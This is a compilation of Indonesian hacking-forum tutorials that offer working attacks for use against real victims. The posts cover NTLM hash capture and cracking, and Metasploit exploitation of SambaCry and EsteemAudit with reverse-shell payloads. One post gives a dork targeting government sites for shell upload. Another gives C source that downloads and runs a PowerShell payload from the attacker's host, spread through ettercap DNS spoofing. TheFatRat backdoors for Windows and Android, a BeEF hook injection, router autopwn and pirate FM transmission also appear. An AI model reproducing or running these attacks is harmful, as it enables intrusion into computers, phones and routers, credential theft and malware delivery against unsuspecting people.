BackBox Indonesia - Exploitation

Hacking windows 7,8,10 (Responder + john + MS17-010)

Thu, 24 May 2018 06:43:23 +0000

Hallo guys,
Kali ini saya akan share bagaimana caranya hacking komputer (berbasis windows) di dalam suatu jaringan.
Menurut saya cara ini paling efektif dari sekian cara yang pernah saya pelajari sebelumnya. Karena target di sini adalah hampir semua versi windows yang menjadi target kita.

Bahan bahan yang harus kita persiapkan.
1. Responder [ https://github.com/SpiderLabs/Responder ]
2. John (John the Ripper) [ https://github.com/koboi137/john ]
3. Metasploit

Pertama adalah Responder.
Untuk cara installasinya cukup clone dari github

Code:
$ git clone https://github.com/SpiderLabs/Responder

Tools ini fungsinya untuk mengarahkan setiap request di browser yang membuka hostname yang belum terpointer ke ip address atau domain yang di buka belum terdaftar di whois kemudian belum terpointer ke ip address. Sebagai contoh linknya seperti ini "http://localdomain/", yang nantinya setiap link tersebut di arahkan ke ip address kita untuk mendapatkan NTLM (NeTwork LAN Manager) Hash. NTLM Hash ini bisa kita crack untuk mendapatkan password dari system target.

Kedua installasi john.
John yang kita butuhkan di sini adalah john versi jumbo, yang kita pakai secara default di system backbox sendiri itu masih versi yang biasa. Makanya saya buatkan git baru untuk installasi john di system backbox yang sekarang. Kalo di system kita sudah terpasang versi jumbo, cara ini bisa kalian skip.

Code:
$ sudo su

$ apt-get install openssl libgmp-dev libgomp1

$ cd /opt

$ git clone https://github.com/koboi137/john

$ cd john/

$ mv librexgen.so.2.0.8 /usr/local/lib/

$ ln -s /usr/local/lib/librexgen.so.2.0.8 /usr/local/lib/librexgen.so.2.0

$ ln -s /usr/local/lib/librexgen.so.2.0.8 /usr/local/lib/librexgen.so

$ ldconfig

Cara mengeksekusi john

Code:
$ /opt/john/john

Yang ketiga metasploit.
Secara default metasploit sudah terinstall di system backbox, tapi kalo kalian belum menginstall metasploit bisa baca panduannya di github
=> https://github.com/rapid7/metasploit-fra...nvironment

Oke kalo semuanya sudah terinstall kita masuk ke cara exploitasinya.
Pertama kita jalankan Responder

Code:
$ cd Responder

$ python Responder.py -I wlan0

Options -I adalah interface yang kita gunakan, di sini saya menggunakan interface wlan0 karena saya bermain di jaringan wireless.
Kurang lebih nanti akan seperti ini prosesnya

Di paling bawah ada keterangan NTLM Hash, dan itulah tujuan kita menggunakan responder yaitu mendapatkan NTLM Hash yang nantinya akan kita crack menggunakan john.

Setelah kita mendapatkan NTLM Hash langkah selanjutnya kita crack menggunakan john.
Perintahnya kurang lebih seperti ini.

Code:
$ cd Responder

$ cd logs/

$ /opt/john/john HTTP-NTLMv2-[IPADDRESS].txt

Atau kalian juga bisa menggunakan wordlist, kalo cara ini tidak mendapatkan hasil.

Hasilnya akan menjadi seperti ini kalo kalian berhasil meng crack Hash yang kita dapat dari Responder.

Setelah kita mendapatkan user dan password komputer target, kita langsung menggunakan metasploit untuk masuk ke komputer target.
Langkah selanjutnya akan saya lanjut nanti. Sorry tutorialnya belum beres hehe

Membajak frekuensi radio menggunakan raspberry pi dan kawat

Sun, 10 Dec 2017 07:11:15 +0000

Okay gus kali ini saya akan coba sedikit sharing ilmu mengenai frekuensi..
Sebelum memasukin isi threads kali ini saya ingin menyampaikan DISCLAIMER terlebih dahulu..

Karena pembahasan kali ini agak sedikit melanggar aturan yang ada di negeri ini, harapan saya dengan adanya thread kali ini tidak ada orang yang menyakalahgunakan cara yang saya share di sini. Thread ini sifatnya adalah untuk pembelajaran saja, kalo ada orang yang menyalah gunakan cara yang telah di share di thread ini saya tidak bertanggung jawab. Karena di sini saya niatnya untuk membagikan ilmu pengetahuan kepada siapa saja yang ingin bejalar di forum ini.

Okay tanpa basa basi lagi saya akan coba praktekkan langkah" nya.
Sebelum masuk ke materi kali ini kita harus siapkan terlebih dahulu "Raspberry pi" dan "Kawat" nya. Kalo belum punya, kita bisa beli di toko online seperti tokopedia dll.

Setelah kita mempersiapkan raspberry nya kita coba install aplikasi untuk mengirim suara ke dalam frekuensi namanya yaitu fm_transmiter
Untuk cara installasinya cukup mudah, kita cukup ketikan perintah ini di terminal raspberry pi kita.

Code:
$ sudo apt-get install make gcc g++

$ git clone https://github.com/markondej/fm_transmitter

$ cd fm_transmitter

$ sudo make

$ sudo cp fm_transmitter /usr/bin/fm_transmitter

Setelah fm_transmitter nya terinstall di raspberry, langkah selanjutnya kita tempelkan kawat besi atau tembaga ke dalam pin "GPIO 4" raspberry pi nya. Kalo kurang jelas bisa di lihat di sini skemanya.

Setelah itu kita eksekusi saja tools yang sudah kita install tadi. Sebagai contoh, perintahnya seperti ini

Code:
$ sudo fm_transmitter -f 103.800 -r sound.wav

Penjelasan:
-f = Frekuensi yang akan kita injeksi
-r = Nama file yang akan kita transmit ke frekuensi

Cukup mudah bukan caranya??
Kalo kalian kurang jelas dalam penggunaan nya bisa lihat video di bawah ini.

Okay mungkin seperti itu cara yang bisa kita lakunan untuk membajak frekuensi radio menggunakan raspberry pi.
Mohon maaf kalo ada kata yang kurang jelas.
Akhir kata, wasalam =))

Tutorial Testing WannaCry and Petrwrap Petya 2017

Mon, 03 Jul 2017 12:32:46 +0000

Ini hanya Tutorial Testing Ransomware yang sekarang lagi booming di Tahun 2017.
Yaitu Ransomware WannaCry dan Petrwrap/Petya.
Gunakan Dengan Resiko Anda Sendiri.
Untuk tujuan pembelajaran saja.
Untuk tujuan pendidikan saja
NOTE : JANGAN DIJAILIN KE ORANG, TEMAN, KE WARNET, ATAU PACAR.
KALO GABISA DECRYPT NYA !!! :V :gerah:lol

Samba Exploit (CVE-2017-7494) SambaCry?

Wed, 14 Jun 2017 04:12:15 +0000

Setelah beberapa waktu lalu sempet tenar WannaCry dengan memakai SMB Exploit (EternalBlue & DoublePulsar) di Windows, sesaat kemudian juga ditemukan vulnerability di OS keluarga Linux yang menjalankan SAMBA sebagai file-sharing daemon nya. Samba Exploit ini dapat menyerang service Samba versi 3.5.0 sampai 4.4.14, 4.5.10, and 4.6.4. Lebih tepatnya exploit ini memanfaatkan bug writeable file pada versi Samba tersebut untuk melakukan RCE (Remote Code Execution) di komputer korban.

1. Dapatkan module Metasploit dari Samba Exploit (is_known_pipename.rb)

Code:
root@attackermachine~:# wget https://github.com/rapid7/metasploit-framework/blob/0520d7cf76f8e5e654cb60f157772200c1b9e230/modules/exploits/linux/samba/is_known_pipename.rb -O /opt/metasploit-frameworks/modules/exploits/linux/samba/sambacry.rb

Keterangan :
wget akan mengunduh file is_known_pipe_name.rb dan akan menaruhnya di direktori Metasploit Framework dengan nama sambacry.rb
Dalam hal ini bisa saja letak direktori Metasploit Framework kalian bukan di /opt/

2. Jalankan msfconsole dan mulai exploitasi

Code:
root@attackermachine~:# msfconsole

msf > use exploit/linux/samba/sambacry

msf exploit(sambacry) > set PAYLOAD linux/x64/meterpreter/reverse_tcp

msf exploit(sambacry) > set RHOST IP_KORBAN

msf exploit(sambacry) > set LHOST IP_LISTENER_ATTACKER

msf exploit(sambacry) > set TARGET 3

msf exploit(sambacry) > exploit

Keterangan :
Jika architecture OS korban adalah 32bit maka : set PAYLOAD linux/meterpreter/reverse_tcp
Untuk set TARGET saya memilih opsi 3, jalankan perintah show targets untuk melihat list architecture target yang tersedia.

3. Jika exploitasi berhasil, maka akan muncul tampilan seperti berikut

Bonus video :

Oke sekian post nya, semoga bermanfaat. Terimakasih.

RDP Exploit dengan EsteemAudit

Sun, 11 Jun 2017 12:03:53 +0000

Setelah ramai dengan Eternal Exploit pada WannaCry Ransomware, masih ada salah satu Exploit dari NSA yang belum di-patch! EsteemAudit atau disebut dengan CVE-2017-9073 adalah sebuah Exploit Remote Desktop Connection (RDP) pada sistem operasi Windows Server 2003 dan Windows XP.

Dalam post ini saya akan memakai EsteemAudit dari FuzzyBunch yang sudah di porting menjadi module Metasploit

1. Download & ekstrak file yang dibutuhkan
Source : Esteemaudit-Metasploit

Atau clone langsung seperti berikut

Code:
root@attackermachine:~/tool# git clone https://github.com/BlackMathIT/Esteemaudit-Metasploit.git

root@attackermachine:~/tool# cd Esteemaudit-Metasploit/

root@attackermachine:~/tool/Esteemaudit-Metasploit# ls -l

2. Didalam nya akan ada 2 file dan 1 folder. Pindahkan semua file yang dibutuhkan ke direktori yang diperlukan.

Code:
root@attackermachine:~/tool/Esteemaudit-Metasploit# mkdir /opt/metasploit-framework/modules/exploits/windows/rdp

root@attackermachine:~/tool/Esteemaudit-Metasploit# cp esteemaudit.rb /opt/metasploit-framework/modules/exploits/windows/rdp/

root@attackermachine:~/tool/Esteemaudit-Metasploit# cd files/

root@attackermachine:~/tool/Esteemaudit-Metasploit/files# mkdir /usr/share/esteemaudit

root@attackermachine:~/tool/Esteemaudit-Metasploit/files# cp * /usr/share/esteemaudit/

3. Buka msfconsole dan mulai exploitasi dengan EsteemAudit

Code:
msf > use exploit/windows/rdp/esteemaudit

msf exploit(esteemaudit) > set PAYLOAD windows/meterpreter/reverse_tcp

msf exploit(esteemaudit) > set LHOST IP_LISTENER_ATTACKER

msf exploit(esteemaudit) > set LPORT PORT_LISTERNER_ATTACKER

msf exploit(esteemaudit) > set TARGETARCHITECTURE x86

Jika target/korban adalah 64bit maka :
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set TARGETARCHITECTURE x86 64-bit

Lihat target apa saja yang bisa di exploit dengan modul ini dengan perintah berikut

Code:
msf exploit(esteemaudit) > show targets

Set target sesuai urutan nomor list yang ada dan jalankan exploit. Misalnya jika targetnya adalah Windows XP SP2 maka seperti berikut.

Code:
msf exploit(esteemaudit) > set TARGET 4

msf exploit(esteemaudit) > exploit

Jika sukses akan terbuka sesi meterpreter seperti berikut.

Bonus Video :

NOTES :
Hanya untuk RDP pada server windows yang menggunakan DOMAIN, bukan WORKGROUP.

Oke sekian pos nya, semoga bermanfaat. Terimakasih.

Hacking Windows 7 using EternalBlue & DoublePulsar via Metasploit on Backbox Linux

Fri, 05 May 2017 07:59:53 +0000

Tutorial cara Hack Windows 7 (all services pack) (x86) (x64) di 1 Jaringan Tanpa si Korban Mendownload dan Menjalankan Payload/RAT nya, menggunakan RCE/0 Days ini ya guyss...

Simak Aja Tutorialnyaa.. Kalau Ngerti ada Gajelas.

Bisa kontak saya Di Facebook/Thread ini okayyy :D

Hack Window 7 Menggunakan Shadowbroker (EternalBlue + DoublePulsar)

Sun, 30 Apr 2017 07:32:01 +0000

thread pertama, >.< masih blajar , cuman mau sharing doang

untuk setup shadowbrokernya bisa liat di thread ini http://www.backboxindonesia.or.id/thread...-1027.html

untuk videonya dibawah

sekian,,

Cara install FuzzyBunch di Backbox Linux

Wed, 26 Apr 2017 17:06:48 +0000

Selamat malam semuanya..
Kali ini saya akan sedikit menulis cara install FuzzyBunch yang katanya baru" ini telah di rilis oleh salah satu group hacker terkenal Equation Group..
Dengan adanya berita ini saya mulai semangat lagi ngoding untuk merubah dunia menjadi lebih baik lagi, khususnya di dunia per hackingan atau apalah ga paham juga sih..
Ma'lum saya masih awam juga sih sebenernya ;)
Intinya di pembahasan kali ini saya akan mencoba mengangkat semangat para pecinta open source khususnya bagi pengguna Backbox Linux..
Tanpa basa basi lagi kita coba praktekkan gimana cara installnya..

Pertama :
Kita install terlebih dahulu wine di dalam system dengan perintah

Code:
koboi@backbox:~# sudo apt-get install wine -y

Kedua :
Install python versi 2.6.6 menggunakan wine

Code:
koboi@backbox:~# wget https://www.python.org/ftp/python/2.6.6/python-2.6.6.msi

koboi@backbox:~# wine msiexec /i python-2.6.6.msi

Ketiga :
Install pywin32 menggunakan wine juga

Code:
koboi@backbox:~# wget https://sourceforge.net/projects/pywin32/files/pywin32/Build%20221/pywin32-221.win32-py2.6.exe/download -O pywin32-221.win32-py2.6.exe

koboi@backbox:~# wine pywin32-221.win32-py2.6.exe

Keempat :
Install FuzzyBunch di dalam system dengan mengetikan perintah ini

Code:
koboi@backbox:~# wget http://www.backboxindonesia.or.id/tmp/fuzzbunch_1-2_all.deb

koboi@backbox:~# sudo dpkg -i fuzzbunch_1-2_all.deb

Keterangan :
wget = Untuk mendownload file Shadowbroker
dpkg -i = Untuk menginstall paket deb yang telah kita download menggunakan wget

Keempat :
Kita bisa cari aplikasi di pencarian dengan mengetikan "FuzzBunch"

atau bisa juga mengetikan di terminal

Code:
koboi@backbox:~# fuzzbunch

Sampai step ini installasi sudah selesai. Kalo masih ada error atau kendala bisa di ketik di komentar berikut dengan penjelasan yang jelas ya ;)

Note : Kalo penasaran file .deb nya ada backdoornya silahkan reverse engine atau bongkar sampe ke akar"nya.. :)

Sejauh ini selama saya posting di forum yang trusted sumbernya insya allah bisa di pertanggung jawabkan.. :)

Mungkin tutorial cara menggunakan FuzzyBunch nya akan di lanjut lagi nanti siang atau pagi.. Kalo pas bikin tutor ini sih jam 1 pagi tepatnya hehe
Akhir kata dari sang newbie ini. :)
Assalamualaikum wr. wb..

How to setup DarkCometRAT + Ngrok on Backbox 2017 IP Public,Without Port Forwading

Thu, 06 Apr 2017 15:23:31 +0000

Apa itu Ngrok ?
Ngrok adalah proxy server untuk membuat / membuka jaringan private melalui NAT atau firewall untuk menghubungkan localhost ke internet dengan tunnel yang aman.
Ngrok adalah software yang digunkan untuk mempublikasikan localhost ke web.
Jadi ini saya bermain RAT menggunakan DarkComet (Remote Administrations Tool) di Linux.
Dijalan menggunakan wine disini. Tanpa PORT FORWARDING !

Simak saja Tutorialnya dibawah ini ya guys !

Create Your Own KeyLogger Using BeeLogger On Backbox 2017

Thu, 23 Mar 2017 04:17:55 +0000

Simak, Video Tutorial Nya ya Guyss :v, Jadi BeeLogger ini fungsi nya Seperti KeyLogger.

Apa itu KeyLogger ? KeyLogger (juga disebut sebagai perangkat lunak mata-mata) adalah sebuah program kecil yang memonitor setiap keystroke pengguna mengetik pada keyboard komputer tertentu.

Jadi, BeeLogger ini bisa menyimpan Akun Seperti Facebook, Instagram, Twitter,dll. Bahkan ketika kita mengetik apapun akan muncul result nya. Result nya di kirim melalui email guys.
Yaudah, tonton aja video nya :v. Jangan Lupa Like dan Subscribe !!! :D

JDIH Gov ID FCKEditor

Tue, 27 Dec 2016 17:08:34 +0000

Quote:++++++++++++++++++++++++++++++++++++++++++++++++
JDIH FCKEDITOR
++++++++++++++++++++++++++++++++++++++++++++++++
Dork:
intitle:"Jaringan Dokumentasi Informasi Hukum"
exploit:
jdih.target(dot)go(dot)id/editor/filemanager/connectors/uploadtest.html
location file:
jdih.target.go.id/jdih/foto_upload/file.nganu
+++++++++++++++++++++++++++++++++++++++++++++++++
Fire fire fire !!!

untuk mengupload shell kalian cari reperensinya saja dari yang lain :)

PowerShell Attack Vector - Alphanumeric Shellcode Injector kawin DNS Spoofing

Wed, 14 Dec 2016 18:55:01 +0000

Warning!

Buat ente yang merasa pingin hek satelit ato ngehex CIA sorry bray, mending gausah diterusin bacanya, salah kamar bray. TS masi folos nubi tjoepoeh imut kyutt unyu tralala.

Bingung mo nulis apaan, jadi gini intinya aing pingin syeer salah satu anu yang masih anu melewati AV lawas yang gapernah update.

Keterangan :
1. IP Attacker : 192.168.56.1
2. IP Victim : gatau ane mah, bodoamat yang penting bisa obok obok.

MEMASAK PAYLOAD BUAT MAKAN MALEM :*

1. Jadi user root dulu biar afdol

Code:
$ sudo su

2. Buka setoolkit

Code:
# setoolkit

Kalo udah kebuka langsung aja pilih nomer 1 (Social Engineering Attacks) > Pilih nomer 9 (Powershell attack vector) > Pilih nomer 1 (Powershell Alphanumeric Shellcode Injector)
Kalo udah masukin IP & Port ente yang berperan sebagai attacker, kalo udah pilih no aja, Ctrl+C aja sampe setoolkit nutup dan balik ke terminal.

2. Secara otomatis setoolkit bakal generate sebuah payload dan bakalan disimpen di /root/.set/reports/powershell/ Jadi kita pindah aja ke direktori tsb dan liat isinya.

Code:
# cd /root/.set/reports/powershell/

Didalem nya akan ada sebuah file payload bernama x86_powershell_injection.txt

Udah gitu kita pindah itu file ke web directory.

Code:
# mv x86_powershell_injection.txt /var/www/html/pyld.txt

Oke ayok ikutan pindah dir ke sana juga.

Code:
# cd /var/www/html/

3. Sekarang ane ngoding sebuah source program pake bahasa C

Code:
# nano trap.c

Nih source nya :

Code:
#include 

#include 

int main()

{

    system("powershell.exe \"IEX ((new-object net.webclient).downloadstring('http://192.168.56.1/pyld.txt'))\"");

    return 0;

}

192.168.56.1 itu IP ente/attacker, jadi fungsi program ini ntar saat dijalanin si korban bakalan ngunduh dan ngeksekusi file payload kita. Jadi komputer kita ntar juga bakal jadi webserver bentar.

4. Compile source nya menjadi program (.exe)

Untuk melakukan cross-compilation pada linux kalian memerlukan MinGW

Baca disini cara install nya

Cara ngompile nya gini

Code:
# i686-w64-mingw32-gcc -o trap.exe trap.c

5. Compress file program nya jadi zip

Code:
# zip trap.zip trap.exe

6. Buat file index.html yang bisa redirect ke file trap.zip

Code:
# nano index.html

Code nya begini nih :

DNS SPOOFING

Opsional sih ini cara nebar nya gimana, yang penting korban kudu buka file trap.exe

*Kalau ente berada di isolated-network (misal : .id) gausah pake dns spoofing, dan upload file pyld.txt ke hosting pribadi atau apa yang penting bisa diliat korban, jadi sesuaiin juga IP dalam source program trap.exe

DNS Spoofing ini bakal berguna kalo ente ada di jaringan rumahan / warung wifi / pokoknya yang gak isolated-client (bisa arp poisoning / ping & scan hosts lain)

1. Edit konfigurasi ettercap

Code:
# nano /etc/ettercap/etter.dns

Cari kata microsof sucks, maka akan ketemu beberapa baris konfigurasi microsoft. Disable semua dengan menambahkan tanda pagar. Trus tambahin IP ente.

Ntar korban yang terspoof ketika ingin mengakses web apa saja bakalan dialihkan ke IP ente. Dan saat membuka index.html justru akan dialihkan untuk mendownload file trap.exe

2. Mulai DNS Spoofing

Code:
# ettercap -G

- Klik tab Sniff > Pilih Uniffied sniffing... > Pilih Network interface yang dipakai [eth0/eth1/wlan0/wlan1]

- Klik tab Hosts > Pilih Scan for hosts

- Klik tab Hosts > Pilih Hosts list > Masukkan IP Gateway ke Target 1 > Masukkan IP korban ke Target 2. Gatau IP nya? Masukin aja semua IP selain gateway ke Target 2.
Cara liat IP Gateway, buka terminal baru trus :

Code:
$ sudo route -n

- Klik tab Mitm > Pilih Arp poisoning... > Centang pada Sniff remote connections.

- Klik tab Plugins > Pilih Manage the plugins > Klik 2x pada dns_spoof supaya aktif

- Klik tab Start > Pilih Start sniffing

MENGAKTIFKAN WEB SERVER

Gini caranya, buka terminal baru dulu, trus :

Code:
$ sudo service apache2 start

LISTENING [b][u]METERPRETER DI METASPLOIT [/u][/b]

1. Buka METASPLOIT FRAMEWORK CONSOLE di terminal baru

Code:
$ sudo msfpayload

2. Setting Exploit, Listen Host & Port

Code:
> use exploit/multi/handler

> set PAYLOAD windows/meterpreter/reverse_tcp

> set LHOST 192.168.56.1

> set LPORT 69

> exploit

Masukkin IP ente dan Port sesuai yang di set di payload awal tadi.

Sekarang tunggu dengan sabar sampai ada yang kena..

TESTING DI WINDOWS 8

di Windows XP & 7 udah ane test dan WORK, sorry ini ane maksimal test Win8. Mau test Win 8.1/Win10 gakuat, maklum laptop buzux dipake VirtualBox

BUKTI WINDOWS DEFENDER & FIREWALL DALAM KEADAAN ON :

KORBAN :

- Saat korban mencoba mengakses web lain (misal : cinem*indo.stream) namun justru dialihkan ke alamat IP Attacker/Ane bray.

- Saat korban me-load index.html di web server ane, sama file index justru dialihkan ke http://192.168.56.1/trap.zip biar korban otomatis download (Kalo browser nya Chrome gitu, kalo lainnya ditanyain dulu).

- Abis di download, 70% korban mungkin secara tak sengaja membuka file trap.exe didalam nya.

- File trap.exe tereksekusi, maka akan mendownload otomatis (secara background) file pyld.txt dan mengeksekusinya.

- Crott deh.

Oke sekian post dari ane.. tak terasa udah hampir pagi. Kalo ada yang gamudeng monggo di komeng bray, tapi ane balesnya juga kalo sempet yo, dah ngantuk soalnyah

Bobo dolo ea beibz

[Old but Gold] The Javascript Keylogger: Another Level of Tapping

Mon, 12 Sep 2016 02:55:20 +0000

hola linuxer setanah air, dalem kesempatan kali ini ane mau berbagi tentang kehebatan tools MITMf alias Man In The Middle framework yang jadi salah 1 tool di DracOs Linux. Tool ini ga beda jauh sama bettercap, kenapa? karena basicnya memang sebuah tool untuk man in the middle namun ada 1 yang bikin MITMf spesial yaitu javascript keylogger yang udah langsung disediain dan siap pake. Dalam video ini ane bakal ngetes javascript keylogger si MITMf ini, monggo dinikmati

sumur dan link penting:
https://github.com/byt3bl33d3r/MITMf/wiki/Installation
http://stackoverflow.com/questions/12647...ip-install
https://github.com/byt3bl33d3r/MITMf/issues/240
http://werkzeug.pocoo.org/docs/0.11/installation/
https://github.com/pyca/cryptography/issues/2280
https://pypi.python.org/pypi/NetfilterQueue/0.3

Hacking Android Using TheFatRat dan Metasploit

Thu, 01 Sep 2016 03:40:25 +0000

hello gan thread kali ini ane mau share hacking android dengan tool fatrat sebagai backdoornya kalo kemaren exploit windows nah ini targetnya android, yok langsung aja mendarat..

bikin backdoornya dulu :

Code:
https://asciinema.org/a/a9hn2qqllasm8sw51t9jzcgm6

open metasploit :

Code:
sudo msfconsole

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set lhost "ipente"

set lport "default"

exploit

sampe disini ente kirim backdoor ke korban entah mau pakek teknik apa "use your brain"
kalo mau outdoor network mesti set dulu router, GGL ada kayaknya ane lupa ngeset :P
kalo backdoor udah kebuka entar meterpreter session opened, sampe disini ente udh masuk ke device korban terserah mau ngapain suka2 ente :D ketik help.
sekian semoga bermanfaat gunakan dengan bijak.

source : here

Exploit Windows Using TheFatRat dan Metasploit

Sat, 30 Jul 2016 12:20:37 +0000

Fatrat adalah backdoor creator yang di gunakan untuk meremote access perangkat lunak seperti windows, android, mac dan masih banyak lagi yang bisa di gunakan oleh thefatrat ini.
langsung aja gan lets go..

Install fatrat :

Code:
git clone https://github.com/Screetsec/TheFatRat.git

cd TheFatRat

chmod +x fatrat ; chmod +x powerfull.sh

sudo ./fatrat

Make Backdoornya :
https://asciinema.org/a/76d9tcl1uiikipv8dhjr2vow8

Run Metasploit :

Code:
sudo msfconsole

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost "ip ente"

set lport 444

exploit

atau klik ini ~> https://asciinema.org/a/7wh8cppwm5a3glwsezcus8riw

Belum paham tonton video tutorialnya disini ~> https://youtu.be/Aw1mxwpmkd4 atau di bawah ini:

Source : http://www.cyber-space.ga/2016/07/exploi...t-and.html

Duet maut bettercap dan Metasploit vs Windows 7

Thu, 28 Jul 2016 11:44:48 +0000

Bug adobe flash player yang terkenal dilakuin oleh "hacking team" taun 2015 lalu menyisakan ratusan GB data sensitif di internet.
Dan ane MUNGKIN berhasil nyari tau gimana cara mereka manfaatin celah adobe flash saat itu
berikut tutorial ane, pake 720p biar jelas dan ane dengan senantiasa buat berdiskusi dimari

sumber: http://arstechnica.com/security/2015/07/...king-team/

[ASK] Mau bertanya ttng nmap

Wed, 20 Jul 2016 15:09:23 +0000

Nmap scan report for 10.10.14.79
Host is up (0.00041s latency).
Not shown: 995 filtered ports
PORT      STATE SERVICE
135/tcp   open msrpc
139/tcp   open netbios-ssn
445/tcp   open microsoft-ds
7741/tcp open scriptview
49156/tcp open unknown
MAC Address: 98:83:8906:5C (Samsung Electronics)

Nmap scan report for 10.10.14.82
Host is up (0.00044s latency).
Not shown: 992 filtered ports
PORT     STATE SERVICE
80/tcp   open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1801/tcp open msmq
2103/tcp open zephyr-clt
2105/tcp open eklogin
2107/tcp open msmq-mgmt
MAC Address: 0054:61:BA:0F (Samsung Electronics)

Nmap scan report for 10.10.14.92
Host is up (0.00031s latency).
Not shown: 992 filtered ports
PORT     STATE SERVICE
80/tcp   open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1801/tcp open msmq
2103/tcp open zephyr-clt
2105/tcp open eklogin
2107/tcp open msmq-mgmt
MAC Address: 20:89:84:F4:64:1A (Compal Information (kunshan))

Nmap scan report for 10.10.14.96
Host is up (0.00024s latency).
All 1000 scanned ports on 10.10.14.96 are closed
MAC Address: 08:62:66C:B4:3E (Asustek Computer)

Nmap scan report for 10.10.14.16
Host is up (0.000014s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds

maaf ane baru belajar nmap
dari port2 di atas ada yang bisa di exploitasi ?
kalo ada yang bisa di exploitasi tolong di jelasin

Nganu Router make Routersploit ala newbi kelas teri

Sun, 29 May 2016 09:35:32 +0000

Hello para stahku sekalian :D
Kali ini Newbie kelas teri bakalan ngasih sedikit materi :P Semoga bermanfaat dan gak TS Gak jadi bahan bully :v

Okeh, kali ini ane mau bawain materi tentang Routersploit. Pasti para stahku udah tau :D

Okeh gausah panjang lebar kali tinggi :D langsung ke KTP :*

pastikan routersploit udah terinstall di tempat ente :v
kalau belum, bisa ke link :   https://github.com/reverse-shell/routersploit

kalau udah terinstall ketik "cd routersploit" (tanpa tanda petik)

setelah itu ketikan lagi ./rsf.py

okeh, setelah itu kita ketik "use scanners/autopwn" lalu enter.

terus "show options" untuk ngelihat anunya :v

kalau udah, langsung kita "set target 192.168.1.1" itu ip router ane :v

terus kalau udah "run" . tunggu sampai nemuin exploitnya :v


nah itu udah kelihatan, langsung ajah "use exploits/zte/f6xx_default_root"


okeh :v , terus "set target 192.168.1.1" langsung "run"

dan akhirnya

tara :v

Okeh, cukup sekian Materi dari Newbi kelas TERI, mungkin ini bukanlah apa-apa :v tapi percayalah, hatimu padaku, bila kau inginkan aku akan selalu menjagamu :* *lah malah nyanyi* :3

okeh sekian dan terimakasih.

--Thanks to BackBox Medan Team--

[Tanya] Gimana sih Cara mastah kirim backdoor ?

Sun, 22 May 2016 20:23:20 +0000

Dear para mastah :D Gimana sih cara kalian kirim backdoor ketarget tanpa main fisik :v :D Newbi bertanya, mohon dijawab :D makasih stah :D

How I RickRoll "Bokeper" For Fun

Fri, 06 May 2016 06:42:17 +0000

hey hey hey sup guys, sup_dawg in the house
baru aja tadi pagi ane bikin tutorial dimari.
Beda dengan sebelumnya kali ini kita ga main evil twin dulu ya guys karena pas ane liat udah ada yang bikin tutorial sniffing bettercap, jadi ane skip soal hsts bypass dan loncat ke penggunaan bettercap dengan module proxy-module dengan submodul injectjs.

Ok dalem tutorial ini ane harep yang baca paling ngga udah ngerti sedikit gimana cara pake bettercap dan beef, or kalian bisa diskusi via fb *karena ane lebih sering muncul di fb, maksudnya biar fast respond. Let's get started,

seperti pada umumnya yang kalian harus lakuin adalah konek ke wifi target, trus aktifin beef-xss, login beef, dan jalankan bettercap

command yang ane pake di bettercap adalah:
bettercap -I wlan0 --proxy --proxy-module injectjs --js-url http://:3000/hook.js -X -P POST -T

after that yang kita lakuin ada menunggu sampe korban browsing dan muncul di tab sebelah kiri beef

see the page url? lol fotobugilsiana.com (padahal gw sendiri yang buka di laptop target), langkah selanjutnya kita bisa ke tab command dan bisa ngelakuin apa aja yang ada disana, disini ane coba redirect rickroll dan hasilnya di laptop target redirect ke sebuah video klip yang lagunya enak gila didenger

Ok what we got here? ternyata gw demen bokep(loh), salah ding wkwkwk ternyata BeEF bisa dipake tanpa soceng dan ya ini cuma contoh kecil, dan sedikit spoiler biar kalian semangat risetnya tutorial bettercap + beef ini bisa digabung dengan tutorial evil twin yang ane buat wuahahaha macam robot power ranger digabung gabung.
tapi ini cuma untuk pembelajaran, jauhi bokep, jauhi narkoba, dekatkan diri dengan janda (loh).
stay calm, stay rickrolled!